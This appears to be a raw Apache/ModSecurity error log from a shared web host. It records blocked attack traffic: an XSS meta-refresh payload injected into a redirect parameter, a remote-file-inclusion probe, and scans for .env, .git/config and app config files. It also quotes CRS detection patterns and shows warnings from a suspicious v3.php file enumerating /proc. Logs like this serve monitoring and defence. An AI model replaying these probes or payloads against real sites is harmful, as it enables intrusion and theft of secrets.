"OWASP_ [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.287989 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://Https:/%Evolv.ElUpc@haedongacademy.org/phpinfo.php?a[]=<a href=https://Pastein.ru/l/utb>urutan kampus Terbaik di Indonesia</a><meta http-equiv=refresh content=0;url=https://Pastein.ru/l/utb />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag "OWASP_AppSensor/IE1"] [tag "CAPEC-242"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.288355 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:01:49.288631 2026] [security2:error] [pid 1842385:tid 1842390] [client 194.233.64.127:51120] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmLRs7kySIUZ3ORnIwWQAAAQA"]
[Tue May 12 06:02:23.193035 2026] [security2:error] [pid 1825179:tid 1825216] [client 18.214.138.148:11787] ModSecurity: Warning. Pattern match "^(?i)(?:file|ftps?|https?):\\\\/\\\\/(\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3})" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-931-APPLICATION-ATTACK-RFI.conf"] [line "36"] [id "931100"] [rev "2"] [msg "Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [data "Matched Data: https://142.93.41.246 found within ARGS:url: https://142.93.41.246/"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-rfi"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmT9r1yOh9TvizezipGwAAAFI"]
[Tue May 12 06:02:23.193522 2026] [security2:error] [pid 1825179:tid 1825216] [client 18.214.138.148:11787] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmT9r1yOh9TvizezipGwAAAFI"]
[Tue May 12 06:02:23.193756 2026] [security2:error] [pid 1825179:tid 1825216] [client 18.214.138.148:11787] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agKmT9r1yOh9TvizezipGwAAAFI"]
PHP Warning:  filesize(): stat failed for /proc/591/task/591/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/591/task/591/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/591/task/591/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/591/task/591/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:02:32.301172 2026] [security2:error] [pid 1820198:tid 1820207] [client 111.230.233.46:41408] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecf.com"] [uri "/"] [unique_id "agKmWM1tk6y7yBJLpJpBMQAAAIc"]
[Tue May 12 06:03:01.280090 2026] [security2:error] [pid 1842385:tid 1842402] [client 43.156.44.207:49982] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/author/zcieaxsvzu/"] [unique_id "agKmdRs7kySIUZ3ORnIxBgAAAQw"]
[Tue May 12 06:03:30.261664 2026] [:error] [pid 1842385:tid 1842400] [client 17.246.15.185:51966] File does not exist: /home/domaine1/public_html/erreur.php
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815574/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815574/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815574/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815574/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1815574/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1815574/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:04:04.161664 2026] [security2:error] [pid 1844863:tid 1844879] [client 43.130.12.43:45766] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agKmtPaAnTZtx1_H_wzBigAAAUo"]
[Tue May 12 06:04:10.201338 2026] [security2:error] [pid 1808852:tid 1808860] [client 43.130.12.43:42416] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.letamsgarage.fr"] [uri "/"] [unique_id "agKmuhfeipD4uoG21Fo8IgAAAAU"], referer: http://www.letamsgarage.fr
[Tue May 12 06:04:14.985633 2026] [security2:error] [pid 1820198:tid 1820200] [client 43.130.12.43:51048] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "letamsgarage.fr"] [uri "/"] [unique_id "agKmvs1tk6y7yBJLpJpBjgAAAIA"], referer: https://www.letamsgarage.fr/
PHP Warning:  filesize(): stat failed for /proc/36/task/36/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/36/task/36/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/36/task/36/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/36/task/36/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 06:04:40.181422 2026] [authz_core:error] [pid 1825287:tid 1825312] [client 47.128.58.23:19748] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/customize/error_log
[Tue May 12 06:05:49.316608 2026] [security2:error] [pid 1825287:tid 1825312] [client 185.2.100.199:52460] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agKnHQgpmE1yW0glLdg4iQAAAMc"]
[Tue May 12 06:05:49.316810 2026] [security2:error] [pid 1825287:tid 1825312] [client 185.2.100.199:52460] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agKnHQgpmE1yW0glLdg4iQAAAMc"]
[Tue May 12 06:05:49.317971 2026] [security2:error] [pid 1825287:tid 1825312] [client 185.2.100.199:52460] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agKnHQgpmE1yW0glLdg4iQAAAMc"]
[Tue May 12 06:05:49.413934 2026] [security2:error] [pid 1825179:tid 1825197] [client 185.2.100.199:52466] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agKnHdr1yOh9TvizeziqHAAAAEA"]
[Tue May 12 06:05:49.414121 2026] [security2:error] [pid 1825179:tid 1825197] [client 185.2.100.199:52466] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agKnHdr1yOh9TvizeziqHAAAAEA"]
[Tue May 12 06:05:49.414394 2026] [security2:error] [pid 1825179:tid 1825197] [client 185.2.100.199:52466] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agKnHdr1yOh9TvizeziqHAAAAEA"]
[Tue May 12 06:06:05.787103 2026] [security2:error] [pid 1842385:tid 1842403] [client 43.157.98.187:39106] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "classist.fr"] [uri "/"] [unique_id "agKnLRs7kySIUZ3ORnIx1wAAAQ0"]
[Tue May 12 06:06:09.366117 2026] [proxy_http:error] [pid 1825179:tid 1825200] (20014)Internal error (specific information not available): [client 5.255.124.156:35818] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:09.373887 2026] [proxy_http:error] [pid 1825179:tid 1825220] (20014)Internal error (specific information not available): [client 5.255.124.156:49324] AH01102: error reading status line from remote server 127.0.0.1:2082, referer: http://cpanel.letamsgarage.fr/.git/config
[Tue May 12 06:06:09.373920 2026] [proxy:error] [pid 1825179:tid 1825220] [client 5.255.124.156:49324] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/.git/config, referer: http://cpanel.letamsgarage.fr/.git/config
[Tue May 12 06:06:09.585073 2026] [proxy_http:error] [pid 1808852:tid 1808859] (20014)Internal error (specific information not available): [client 5.255.124.156:59700] AH01102: error reading status line from remote server 127.0.0.1:2082, referer: http://cpanel.letamsgarage.fr/.env.development
[Tue May 12 06:06:09.787723 2026] [security2:error] [pid 1825179:tid 1825198] [client 43.153.15.51:39744] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agKnMdr1yOh9TvizeziqWwAAAEE"]
[Tue May 12 06:06:10.147684 2026] [proxy_http:error] [pid 1825287:tid 1825309] (20014)Internal error (specific information not available): [client 5.255.124.156:35874] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.149207 2026] [proxy_http:error] [pid 1844863:tid 1844878] (20014)Internal error (specific information not available): [client 5.255.124.156:36062] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.149635 2026] [proxy_http:error] [pid 1808852:tid 1808862] (20014)Internal error (specific information not available): [client 5.255.124.156:36090] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.151049 2026] [proxy_http:error] [pid 1820198:tid 1820210] (20014)Internal error (specific information not available): [client 5.255.124.156:36026] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.316928 2026] [proxy_http:error] [pid 1825287:tid 1825327] (20014)Internal error (specific information not available): [client 5.255.124.156:49578] AH01102: error reading status line from remote server 127.0.0.1:2082, referer: http://cpanel.letamsgarage.fr/api/config
[Tue May 12 06:06:10.366261 2026] [proxy_http:error] [pid 1844863:tid 1844875] (20014)Internal error (specific information not available): [client 5.255.124.156:36138] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.366286 2026] [proxy:error] [pid 1844863:tid 1844875] [client 5.255.124.156:36138] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/api/health
[Tue May 12 06:06:10.368207 2026] [proxy_http:error] [pid 1825287:tid 1825307] (20014)Internal error (specific information not available): [client 5.255.124.156:48688] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.368482 2026] [proxy_http:error] [pid 1820198:tid 1820200] (20014)Internal error (specific information not available): [client 5.255.124.156:36150] AH01102: error reading status line from remote server 127.0.0.1:2082
[Tue May 12 06:06:10.368505 2026] [proxy:error] [pid 1820198:tid 1820200] [client 5.255.124.156:36150] AH00898: Error reading from remote server returned by /___proxy_subdomain_cpanel/app-config.json
[Tue May 12 06:06:34.429654 2026] [:error] [pid 1820198:tid 1820213] [client 167.253.65.241:51791] File does not exist: /home/totalcloud/public_html/index.php
[Tue May 12 06:08:00.125204 2026] [security2:error] [pid 1825179:tid 1825222] [client 49.51.253.26:41620] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/2023/10/"] [unique_id "agKnoNr1yOh9Tvizeziq1wAAAFg"]
[Tue May 12 06:08:07.339415 2026] [security2:error] [pid 1842385:tid 1842400] [client 176.65.139.235:60782] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agKnpxs7kySIUZ3ORnIyngAAAQo"]
[Tue May 12 06:08:07.339652 2026] [security2:error] [pid 1842385:tid 1842400] [client 176.65.139.235:60782] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agKnpxs7kySIUZ3ORnIyngAAAQo"]
[Tue May 12 06:08:07.339907 2026] [security2:error] [pid 1842385:tid 1842400] [client 176.65.139.235:60782] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/app/.env"] [unique_id "agKnpxs7kySIUZ3ORnIyngAAAQo"]
[Tue May 12 06:08:33.569162 2026] [authz_core:error] [pid 1808852:tid 1808855] [client 52.203.68.145:10620] AH01630: client denied by server configuration: /home/piregwan/public_html/maintenance/error_log
[Tue May 12 06:09:14.681124 2026] [authz_core:error] [pid 1825287:tid 1825305] [client 51.75.118.97:55400] AH01630: client denied by server configuration: /home/piregwan/public_html/flb/images/error_log
[Tue May 12 06:09:21.997778 2026] [security2:error] [pid 1825287:tid 1825311] [client 43.135.211.148:33830] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/lecteur-heureux/"] [unique_id "agKn8QgpmE1yW0glLdg54QAAAMY"]
[Tue May 12 06:09:30.596496 2026] [security2:error] [pid 1825179:tid 1825205] [client 43.156.43.123:44482] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/"] [unique_id "agKn-tr1yOh9TvizezirKwAAAEc"]
[Tue May 12 06:09:38.086973 2026] [security2:error] [pid 1842385:tid 1842409] [client 52.204.71.8:32026] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".com"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bongacomlive.com"] [unique_id "agKoAhs7kySIUZ3ORnIy-gAAARI"]
[Tue May 12 06:09:38.087345 2026] [security2:error] [pid 1842385:tid 1842409] [client 52.204.71.8:32026] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bongacomlive.com"] [unique_id "agKoAhs7kySIUZ3ORnIy-gAAARI"]
[Tue May 12 06:09:38.087570 2026] [security2:error] [pid 1842385:tid 1842409] [client 52.204.71.8:32026] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/bongacomlive.com"] [unique_id "agKoAhs7kySIUZ3ORnIy-gAAARI"]
